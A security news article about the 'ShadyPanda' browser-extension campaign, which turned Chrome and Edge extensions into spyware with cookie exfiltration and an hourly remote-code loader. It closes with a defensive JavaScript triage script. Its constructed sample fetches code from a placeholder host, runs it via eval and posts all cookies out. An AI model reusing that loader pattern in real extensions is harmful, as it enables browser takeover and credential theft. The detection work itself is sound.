The long-running malicious operation known as “ShadyPanda” has amassed more than 4.3 million installations of browser extensions for Chrome and Edge. Discovered by Koi Security, the operation unfolded in distinct phases: extensions that initially appeared legitimate received successive updates that introduced progressively more severe malicious functionality, ultimately turning them into spyware. The campaign spans 145 unique extensions (20 on Chrome and 125 on Edge), with submissions dating back to 2018. Although Google has since removed all related extensions from the Chrome Web Store, the campaign’s extensions remain listed on the Microsoft Edge Add-ons store, including a single extension that is currently listed with three million installs.
Although the initial submissions for some ShadyPanda extensions occurred as early as 2018, the first indications of malicious activity were not observed until 2023, chiefly in a group of extensions disguised as wallpaper and productivity tools. According to Koi’s researchers, these early versions focused on affiliate fraud: they injected affiliate tracking codes from major platforms such as eBay, Amazon, and Booking.com into links the user was already visiting, so that purchases made by the installed user base were credited to the operators. This was the campaign’s first monetization step, using the installed base for passive financial gain without yet touching user data directly.
The operation escalated in early 2024 with the introduction of search hijacking, a clear sign that the ShadyPanda operators were becoming more aggressive. For instance, an extension named Infinity V+ was observed redirecting users’ search queries to the trovi[.]com domain. Beyond the redirection itself, the same component exfiltrated users’ cookies to dergoodting[.]com and sent their search queries to various gotocdn subdomains, marking the shift from passive revenue skimming to direct data theft and more pervasive manipulation of the user’s browsing.
The most severe phase came later in 2024, when five extensions, including three that had run innocuously since their 2018 and 2019 uploads and had built up a legitimate reputation and install base, were modified through a malicious update to include a full backdoor. The payload gives the operators remote code execution inside the user’s browser. Koi Security described the backdoor’s behaviour: “Every infected browser runs a remote code execution framework. Every hour, it checks api.extensionplay[.]com for new instructions, downloads arbitrary JavaScript, and executes it with full browser API access.” That design makes it not fixed-function malware but a flexible command-and-control loader: the capability of an infected browser is whatever the operators choose to serve on the next hourly check-in.
The backdoor is used to continuously exfiltrate sensitive data, including visited URLs, browser fingerprinting details, and persistent identifiers, AES-encrypted before being sent to the api[.]cleanmasters[.]store endpoint. The encryption protects the operators’ traffic from casual inspection rather than the user. A notable example from this set was the Clean Master extension on the Chrome Web Store, which had accumulated 200,000 installations before it was detected and flagged as malicious. In total, the extensions carrying this backdoor payload had reached a combined install count of 300,000 at the time of discovery.
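The loader shape described in the two paragraphs above (a periodic timer, a fetch of “instructions” from a remote host, and execution of whatever comes back with the extension’s own browser API privileges) is something a defender can triage statically when reviewing an unpacked extension. The script below is an added example written for this page, not Koi Security’s tooling or any code from the ShadyPanda extensions; the manifest and background script it scans are constructed samples, and the domain api.example-c2.invalid is a placeholder, not a real indicator.

```javascript
// Heuristic static triage of an unpacked Chrome/Edge extension for the
// "poll a remote host, then execute the response" backdoor pattern.
// Added example for this page; samples below are constructed, not real IOCs.

const REMOTE_URL = /https?:\/\/[^\s'"`]+/g;
// Sinks that turn a downloaded string into running code.
const CODE_SINKS = [
  /\beval\s*\(/,
  /\bnew\s+Function\s*\(/,
  /chrome\.tabs\.executeScript\s*\(\s*\{[^}]*\bcode\b/,
];
const SENSITIVE_PERMS = new Set([
  "cookies", "webRequest", "webRequestBlocking", "tabs", "history",
  "scripting", "declarativeNetRequest",
]);

// Constructed MV2-style manifest: broad host access plus a CSP that
// re-enables eval, which a store reviewer should already find suspicious.
const SAMPLE_MANIFEST = {
  manifest_version: 2,
  name: "Sample Cleaner",
  version: "4.1.0",
  permissions: ["alarms", "cookies", "storage", "tabs", "<all_urls>"],
  background: { scripts: ["bg.js"], persistent: false },
  content_security_policy: "script-src 'self' 'unsafe-eval'; object-src 'self'",
};

// Constructed background script mimicking the hourly check-in loader.
const SAMPLE_BACKGROUND = `
chrome.alarms.create("sync", { periodInMinutes: 60 });
chrome.alarms.onAlarm.addListener(async () => {
  const r = await fetch("https://api.example-c2.invalid/task?v=4");
  eval(await r.text());
  chrome.cookies.getAll({}, (cs) => fetch("https://api.example-c2.invalid/c",
    { method: "POST", body: JSON.stringify(cs) }));
});
`;

// Constructed benign script for comparison.
const BENIGN_BACKGROUND = `
chrome.runtime.onInstalled.addListener(() => {
  chrome.storage.local.set({ theme: "dark" });
});
`;

function analyzeExtension(manifest, scripts) {
  const findings = [];
  const perms = manifest.permissions || [];
  const hosts = [...perms, ...(manifest.host_permissions || [])];
  const sensitive = perms.filter((p) => SENSITIVE_PERMS.has(p));
  if (sensitive.length) findings.push(`sensitive permissions: ${sensitive.join(", ")}`);
  if (hosts.includes("<all_urls>")) findings.push("host access to <all_urls>");
  const csp = JSON.stringify(manifest.content_security_policy || "");
  if (csp.includes("unsafe-eval")) findings.push("CSP re-enables unsafe-eval");

  const src = scripts.join("\n");
  const periodic = /chrome\.alarms\.create\s*\([^)]*periodInMinutes/.test(src);
  const remoteUrls = [...new Set(src.match(REMOTE_URL) || [])];
  const fetchesRemote = /\bfetch\s*\(/.test(src) && remoteUrls.length > 0;
  const hasCodeSink = CODE_SINKS.some((re) => re.test(src));
  const cookieHarvest = /chrome\.cookies\.getAll\s*\(/.test(src);
  if (periodic) findings.push("periodic alarm (beaconing cadence)");
  if (fetchesRemote) findings.push(`remote fetch: ${remoteUrls.join(", ")}`);
  if (hasCodeSink) findings.push("dynamic code sink (eval / new Function / executeScript code)");
  if (cookieHarvest) findings.push("cookie harvesting via chrome.cookies.getAll");

  // The combination is the signal: remote content reaching a code sink is a
  // loader regardless of which domain is hard-coded today.
  let verdict = "no-loader-pattern";
  if (fetchesRemote && hasCodeSink) {
    verdict = periodic ? "remote-loader-periodic" : "remote-loader";
  }
  return { verdict, findings, remoteUrls };
}

function triageSample() {
  return analyzeExtension(SAMPLE_MANIFEST, [SAMPLE_BACKGROUND]);
}

function triageBenign() {
  return analyzeExtension({ manifest_version: 3, permissions: ["storage"] }, [BENIGN_BACKGROUND]);
}

console.log(JSON.stringify(triageSample(), null, 2));
```

The heuristics are deliberately about structure rather than indicators: hard-coded domains change between updates, but a timer feeding a network fetch into `eval` or `new Function` is the shape any remote-instruction loader must take, so that is what gets flagged. Run it over each script listed in the manifest’s background and content_scripts sections, and treat a hit on an extension that has only just been updated, after years of dormancy, as the priority case.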